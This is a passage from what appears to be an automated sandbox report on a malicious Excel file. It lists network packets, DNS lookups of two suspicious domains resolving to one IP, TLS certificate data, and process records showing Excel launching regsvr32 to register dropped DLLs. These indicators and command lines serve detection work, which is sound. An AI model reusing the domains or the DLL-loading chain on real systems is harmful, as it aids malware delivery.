                                                                                                                                                  Jun 24, 2021 07:08:15.636984110 CEST4434971850.116.92.246192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:15.637250900 CEST49718443192.168.2.350.116.92.246
                                                                                                                                                  Jun 24, 2021 07:08:15.637671947 CEST4434971850.116.92.246192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:15.637784004 CEST49718443192.168.2.350.116.92.246
                                                                                                                                                  Jun 24, 2021 07:10:00.148659945 CEST49718443192.168.2.350.116.92.246
                                                                                                                                                  Jun 24, 2021 07:10:00.151998043 CEST49715443192.168.2.350.116.92.246
                                                                                                                                                  Jun 24, 2021 07:10:00.536171913 CEST49718443192.168.2.350.116.92.246
                                                                                                                                                  Jun 24, 2021 07:10:00.551824093 CEST49715443192.168.2.350.116.92.246
                                                                                                                                                  Jun 24, 2021 07:10:01.208163977 CEST49718443192.168.2.350.116.92.246
                                                                                                                                                  Jun 24, 2021 07:10:01.270636082 CEST49715443192.168.2.350.116.92.246
                                                                                                                                                  Jun 24, 2021 07:10:02.551940918 CEST49718443192.168.2.350.116.92.246
                                                                                                                                                  Jun 24, 2021 07:10:02.692622900 CEST49715443192.168.2.350.116.92.246
                                                                                                                                                  Jun 24, 2021 07:10:05.239670038 CEST49718443192.168.2.350.116.92.246
                                                                                                                                                  Jun 24, 2021 07:10:05.536597967 CEST49715443192.168.2.350.116.92.246
                                                                                                                                                  Jun 24, 2021 07:10:10.599726915 CEST49718443192.168.2.350.116.92.246
                                                                                                                                                  Jun 24, 2021 07:10:11.224627972 CEST49715443192.168.2.350.116.92.246
                                                                                                                                                  Jun 24, 2021 07:10:21.334729910 CEST49718443192.168.2.350.116.92.246
                                                                                                                                                  Jun 24, 2021 07:10:22.600769997 CEST49715443192.168.2.350.116.92.246

                                                                                                                                                  UDP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Jun 24, 2021 07:07:58.551222086 CEST5754453192.168.2.38.8.8.8
                                                                                                                                                  Jun 24, 2021 07:07:58.608194113 CEST53575448.8.8.8192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:07:59.304929972 CEST5598453192.168.2.38.8.8.8
                                                                                                                                                  Jun 24, 2021 07:07:59.358680010 CEST53559848.8.8.8192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:01.570111036 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                  Jun 24, 2021 07:08:01.616175890 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:02.627293110 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                  Jun 24, 2021 07:08:02.675307035 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:08.324184895 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                  Jun 24, 2021 07:08:08.374867916 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:09.124703884 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                  Jun 24, 2021 07:08:09.171845913 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:10.170321941 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                  Jun 24, 2021 07:08:10.338294029 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:10.685076952 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                  Jun 24, 2021 07:08:10.770519018 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:10.813656092 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                  Jun 24, 2021 07:08:10.859767914 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:11.694890022 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                  Jun 24, 2021 07:08:11.777548075 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:12.740520954 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                  Jun 24, 2021 07:08:12.804471970 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:13.108743906 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                  Jun 24, 2021 07:08:13.130660057 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                  Jun 24, 2021 07:08:13.166194916 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:13.176687956 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:13.921674013 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                  Jun 24, 2021 07:08:13.979908943 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:14.431987047 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                  Jun 24, 2021 07:08:14.487782955 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:14.732466936 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                  Jun 24, 2021 07:08:14.786331892 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                  Jun 24, 2021 07:08:14.787906885 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:14.850310087 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:15.507494926 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                  Jun 24, 2021 07:08:15.558471918 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:16.378063917 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                  Jun 24, 2021 07:08:16.434395075 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:17.249475002 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                  Jun 24, 2021 07:08:17.305749893 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:18.041872025 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                  Jun 24, 2021 07:08:18.096410036 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:18.912792921 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                  Jun 24, 2021 07:08:18.979095936 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:19.945848942 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                  Jun 24, 2021 07:08:19.992528915 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:23.004538059 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                  Jun 24, 2021 07:08:23.051384926 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:23.810801983 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                  Jun 24, 2021 07:08:23.857024908 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:32.847471952 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                  Jun 24, 2021 07:08:32.903285980 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:33.335894108 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                  Jun 24, 2021 07:08:33.356601000 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                  Jun 24, 2021 07:08:33.382776976 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                  Jun 24, 2021 07:08:33.383517981 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:33.403004885 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:33.429435968 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:36.344809055 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                  Jun 24, 2021 07:08:36.408083916 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:52.486777067 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                  Jun 24, 2021 07:08:52.562935114 CEST53606338.8.8.8192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:52.854856014 CEST6129253192.168.2.38.8.8.8
                                                                                                                                                  Jun 24, 2021 07:08:52.906996965 CEST53612928.8.8.8192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:09:10.524801970 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                  Jun 24, 2021 07:09:10.589179993 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:09:15.844563007 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                  Jun 24, 2021 07:09:15.903628111 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:09:46.390527010 CEST6194653192.168.2.38.8.8.8
                                                                                                                                                  Jun 24, 2021 07:09:46.458827972 CEST53619468.8.8.8192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:09:47.776896000 CEST6491053192.168.2.38.8.8.8
                                                                                                                                                  Jun 24, 2021 07:09:47.832516909 CEST53649108.8.8.8192.168.2.3

                                                                                                                                                  DNS Queries

                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                  Jun 24, 2021 07:08:13.108743906 CEST192.168.2.38.8.8.80xf071Standard query (0)carpascapital.comA (IP address)IN (0x0001)
                                                                                                                                                  Jun 24, 2021 07:08:14.431987047 CEST192.168.2.38.8.8.80xca6cStandard query (0)gruasphenbogota.comA (IP address)IN (0x0001)

                                                                                                                                                  DNS Answers

                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                  Jun 24, 2021 07:08:13.166194916 CEST8.8.8.8192.168.2.30xf071No error (0)carpascapital.com50.116.92.246A (IP address)IN (0x0001)
                                                                                                                                                  Jun 24, 2021 07:08:14.487782955 CEST8.8.8.8192.168.2.30xca6cNo error (0)gruasphenbogota.com50.116.92.246A (IP address)IN (0x0001)

                                                                                                                                                  HTTPS Packets

                                                                                                                                                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                  Jun 24, 2021 07:08:13.510010958 CEST50.116.92.246443192.168.2.349715CN=*.carpascapital.com CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Fri May 21 05:30:14 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021Thu Aug 19 05:30:14 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                  CN=R3, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USFri Sep 04 02:00:00 CEST 2020Mon Sep 15 18:00:00 CEST 2025
                                                                                                                                                  CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Jan 20 20:14:03 CET 2021Mon Sep 30 20:14:03 CEST 2024
                                                                                                                                                  Jun 24, 2021 07:08:14.905570984 CEST50.116.92.246443192.168.2.349718CN=gruasphenbogota.com CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Mon May 10 05:47:53 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021Sun Aug 08 05:47:53 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                  CN=R3, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USFri Sep 04 02:00:00 CEST 2020Mon Sep 15 18:00:00 CEST 2025
                                                                                                                                                  CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Jan 20 20:14:03 CET 2021Mon Sep 30 20:14:03 CEST 2024

                                                                                                                                                  Code Manipulations

                                                                                                                                                  Statistics

                                                                                                                                                  CPU Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Memory Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                  Behavior

                                                                                                                                                  Click to jump to process

                                                                                                                                                  System Behavior

                                                                                                                                                  General

                                                                                                                                                  Start time:07:08:09
                                                                                                                                                  Start date:24/06/2021
                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                  Imagebase:0x390000
                                                                                                                                                  File size:27110184 bytes
                                                                                                                                                  MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  General

                                                                                                                                                  Start time:07:08:15
                                                                                                                                                  Start date:24/06/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:regsvr32 ..\gihi1.dll
                                                                                                                                                  Imagebase:0xc0000
                                                                                                                                                  File size:20992 bytes
                                                                                                                                                  MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  General

                                                                                                                                                  Start time:07:08:16
                                                                                                                                                  Start date:24/06/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:regsvr32 ..\gihi2.dll
                                                                                                                                                  Imagebase:0x7ff77db90000
                                                                                                                                                  File size:20992 bytes
                                                                                                                                                  MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Disassembly

                                                                                                                                                  Code Analysis

                                                                                                                                                  Reset < >